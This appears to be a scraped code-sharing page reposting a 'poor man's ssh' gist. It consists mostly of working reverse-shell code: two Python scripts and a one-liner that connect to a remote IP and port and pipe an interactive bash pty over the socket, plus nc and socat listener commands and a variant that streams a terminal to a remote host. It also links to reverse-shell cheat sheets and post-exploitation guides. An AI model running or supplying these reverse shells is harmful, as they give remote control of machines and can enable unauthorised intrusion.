sh poor-mans-ssh.sh
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sh poor-mans-ssh.sh相关的知识,希望对你有一定的参考价值。
import sys,socket,os,fcntl,termios,array,select
_,ip,port=sys.argv
print "Opening connection..."
remote = socket.socket()
remote.connect((ip,int(port)))
print "Launching bash..."
pid, fd = os.forkpty()
if pid == 0: # CHILD
os.execlp('/bin/bash', '-i')
# fix window size
buf = array.array('h', [0, 0, 0, 0])
fcntl.ioctl(sys.stdout.fileno(), termios.TIOCGWINSZ, buf, True)
fcntl.ioctl(fd, termios.TIOCSWINSZ, buf)
print "Starting loop..."
while 1:
avail,_,_ = select.select([fd,remote,sys.stdin], [], [])
if fd in avail:
data = os.read(fd, 1024)
os.write(remote.fileno(),data)
os.write(sys.stdout.fileno(), data)
if remote in avail:
data = os.read(remote.fileno(), 1024)
os.write(fd, data)
if sys.stdin in avail:
data = os.read(sys.stdin.fileno(), 1024)
os.write(fd, data)
import sys,socket,os,fcntl,struct,pty,termios
count = 0
def fix_window_size(fd):
global count
if count == 0:
count = 1
zeroes = struct.pack('HHHH', 0, 0, 0, 0)
size_info = fcntl.ioctl(1, termios.TIOCGWINSZ, zeroes)
rows, cols = struct.unpack('HHHH', size_info)[0:2]
size_info = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, termios.TIOCSWINSZ, size_info)
_,ip,port=sys.argv
s = socket.socket()
s.connect((ip,int(port)))
os.dup2(s.fileno(),0)
def socket_read(fd):
fix_window_size(fd)
data = os.read(fd, 1024)
os.write(s.fileno(),data)
return data
pty.spawn(['/bin/bash','-i'], socket_read)
* http://www.ping.eti.br/docs/01/13.txt | "Random Shell Tricks by Teh Crew" - mini hacking guide
* http://pentestmonkey.net/blog/post-exploitation-without-a-tty | Post-Exploitation Without A TTY | pentestmonkey
* http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | Reverse Shell Cheat Sheet | pentestmonkey
* http://bernardodamele.blogspot.ca/2011/09/reverse-shells-one-liners.html | Reverse shells one-liners
* http://serverfault.com/questions/102277/getting-a-tty-in-a-connectback-shell | linux - Getting a TTY in a Connectback Shell - Server Fault
* http://www.dest-unreach.org/socat/doc/socat.html#EXAMPLE_OPTION_CTTY | socat
* http://www.dest-unreach.org/socat/doc/socat-ttyovertcp.txt | www.dest-unreach.org/socat/doc/socat-ttyovertcp.txt
* http://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES | stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES
* http://superuser.com/questions/123790/socat-and-rich-terminals-with-ctrlc-ctrlz-ctrld-propagation | linux - Socat and rich terminals (with Ctrl+C/Ctrl+Z/Ctrl+D propagation) - Super User
* http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/ | Get Your Interactive Reverse Shell on a Webhost | The #Shell
TODO:
* fix 80 character window limit (see http://sqizit.bartletts.id.au/2011/02/14/pseudo-terminals-in-python/)
* auto-kill spawned processes (not clear whether or not this is a problem..., check `ps aux | grep bash` after python quits)
* find a way to get python to print out the shell session to host terminal too (ask Vasi?)
* http://docs.python.org/dev/library/pty.html#pty.spawn
* http://opensource.apple.com/source/python/python-3/python/Lib/pty.py?txt
* http://coshell.googlecode.com/svn/trunk/coshell.py# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# on the CLIENT, run the following:
# nc -l 12345
# on the SERVER, start the "reverse shell"
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345
# now go to the CLIENT, listen on port 12345 for incoming shell connections
nc -l 12345
# that worked, but note that 'nc' does a terrible job emulating a tty
# (arrows keys aren't sent correctly, don't even try launching vim)
# instead, let's install socat, a smarter netcat, via "sudo apt-get install socat" or "brew install socat"
# launch socat, asking it to to talk forward all traffic on 12345 to /dev/ttys003 (raw,echo=0 fix tty issues)
socat `tty`,raw,echo=0 tcp-listen:12345
# enjoy
##
## with gnu screen, to get share a screen session on the network
##
# first ensure you are in a screen session
screen -R
# now start a python job to share it in the background
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(['/usr/bin/screen', '-x'])" 192.168.2.176 12345 &
# when either party logs out of the screen session (via CTRL-d), the python is killed and the socket is closed
##
## poor man's screencast - adapted from http://mrnugget.github.io/blog/2013/08/11/named-pipes/
## assumes your friend on 192.168.2.183 runs "nc -l 9999"
## then you can stream the contents of your terminal (read-only!) to him as follows:
## bonus trick: if you want to save your friend's otherise discarded keystrokes, redirect to a file instead of /dev/null
##
script -t 0 >(nc 192.168.2.183 9999 > /dev/null) 以上是关于sh poor-mans-ssh.sh的主要内容,如果未能解决你的问题,请参考以下文章
如何使我的命令行在具有扩展名(.sh)和名称如“weird.sh.sh.sh”的文件上工作